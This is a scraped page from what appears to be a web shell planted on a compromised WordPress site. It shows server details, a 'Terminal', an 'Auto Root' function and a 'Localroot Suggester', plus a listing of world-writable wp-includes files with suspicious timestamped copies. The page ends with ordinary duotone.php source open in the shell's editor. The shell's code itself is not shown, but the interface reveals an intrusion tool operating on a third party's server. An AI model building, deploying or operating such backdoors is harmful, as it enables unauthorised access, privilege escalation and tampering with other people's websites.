Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 18.116.20.44
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
theprintave /
wp-includes /
Text /
Diff /
Delete
Unzip
Name
Size
Permission
Date
Action
Engine
[ DIR ]
drwxr-xr-x
2025-05-12 07:42
Renderer
[ DIR ]
drwxr-xr-x
2025-05-14 08:48
Renderer.php
6.65
KB
-rwxrwxrwx
2023-05-01 11:06
Session.php
8.89
KB
-rwxrwxrwx
2023-10-12 12:34
annotations.min-20250514003419.js
5.39
KB
-rwxrwxrwx
2024-07-16 17:55
cache-compat.php
5.83
KB
-rwxrwxrwx
2022-10-10 18:22
class-oembed.php
401
B
-rwxrwxrwx
2022-06-17 11:20
class-simplepie.php
453
B
-rwxrwxrwx
2024-11-13 12:36
class-wp-hook.php
15.63
KB
-rwxrwxrwx
2023-09-18 12:41
class-wp-oembed.php
30.91
KB
-rwxrwxrwx
2025-04-15 17:44
class-wp-phpmailer.php
3.71
KB
-rwxrwxrwx
2025-04-15 17:44
class-wp.php
25.7
KB
-rwxrwxrwx
2025-04-15 17:44
clipboard.min.js
8.8
KB
-rwxrwxrwx
2022-10-04 15:55
customize-loader.min-20250513213733.js
3.47
KB
-rwxrwxrwx
2023-02-02 16:36
customize-preview.min-20250514002326.js
10.45
KB
-rwxrwxrwx
2023-02-02 16:36
customize-views-20250513213247.js
4.95
KB
-rwxrwxrwx
2018-06-28 02:30
customize-views.min-20250514060333.js
2.39
KB
-rwxrwxrwx
2021-01-06 15:29
duotone.php
2.67
KB
-rwxrwxrwx
2024-07-16 17:55
edit-post.js
120.43
KB
-rwxrwxrwx
2025-04-30 17:44
editor-20250514002056.js
1.16
MB
-rwxrwxrwx
2025-04-30 17:44
feed-rss.php
1.16
KB
-rwxrwxrwx
2020-01-29 00:45
hooks.min-20250514002648.js
4.66
KB
-rwxrwxrwx
2024-11-13 12:36
hoverIntent.min-20250513214302.js
1.46
KB
-rwxrwxrwx
2022-04-08 20:07
http.php
24.72
KB
-rwxrwxrwx
2025-05-09 07:39
https-migration-20250514045752.php
4.63
KB
-rwxrwxrwx
2023-07-10 22:38
jquery.Jcrop.min.js
22.06
KB
-rwxrwxrwx
2022-03-24 20:07
post-featured-image.php
9.14
KB
-rwxrwxrwx
2024-07-16 17:55
post-formats.php
6.94
KB
-rwxrwxrwx
2024-07-16 17:55
private-apis.min-20250514003319.js
2.75
KB
-rwxrwxrwx
2025-04-15 17:44
registration-functions.php
200
B
-rwxrwxrwx
2020-11-12 11:17
router.min-20250514002902.js
13.21
KB
-rwxrwxrwx
2025-04-15 17:44
spl-autoload-compat.php
441
B
-rwxrwxrwx
2020-11-12 11:17
taxonomy.php
172.1
KB
-rwxrwxrwx
2025-05-09 07:39
widgets-20250514001951.js
52.48
KB
-rwxrwxrwx
2025-04-15 17:44
widgets.php
69.06
KB
-rwxrwxrwx
2025-05-09 07:39
Save
Rename
<?php /** * Duotone block support flag. * * Parts of this source were derived and modified from TinyColor, * released under the MIT license. * * https://github.com/bgrins/TinyColor * * Copyright (c), Brian Grinstead, http://briangrinstead.com * * Permission is hereby granted, free of charge, to any person obtaining * a copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sublicense, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE * LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION * OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. * * @package WordPress * @since 5.8.0 */ // Register the block support. WP_Block_Supports::get_instance()->register( 'duotone', array( 'register_attribute' => array( 'WP_Duotone', 'register_duotone_support' ), ) ); // Add classnames to blocks using duotone support. add_filter( 'render_block', array( 'WP_Duotone', 'render_duotone_support' ), 10, 3 ); add_filter( 'render_block_core/image', array( 'WP_Duotone', 'restore_image_outer_container' ), 10, 1 ); // Enqueue styles. // Block styles (core-block-supports-inline-css) before the style engine (wp_enqueue_stored_styles). // Global styles (global-styles-inline-css) after the other global styles (wp_enqueue_global_styles). add_action( 'wp_enqueue_scripts', array( 'WP_Duotone', 'output_block_styles' ), 9 ); add_action( 'wp_enqueue_scripts', array( 'WP_Duotone', 'output_global_styles' ), 11 ); // Add SVG filters to the footer. Also, for classic themes, output block styles (core-block-supports-inline-css). add_action( 'wp_footer', array( 'WP_Duotone', 'output_footer_assets' ), 10 ); // Add styles and SVGs for use in the editor via the EditorStyles component. add_filter( 'block_editor_settings_all', array( 'WP_Duotone', 'add_editor_settings' ), 10 ); // Migrate the old experimental duotone support flag. add_filter( 'block_type_metadata_settings', array( 'WP_Duotone', 'migrate_experimental_duotone_support_flag' ), 10, 2 );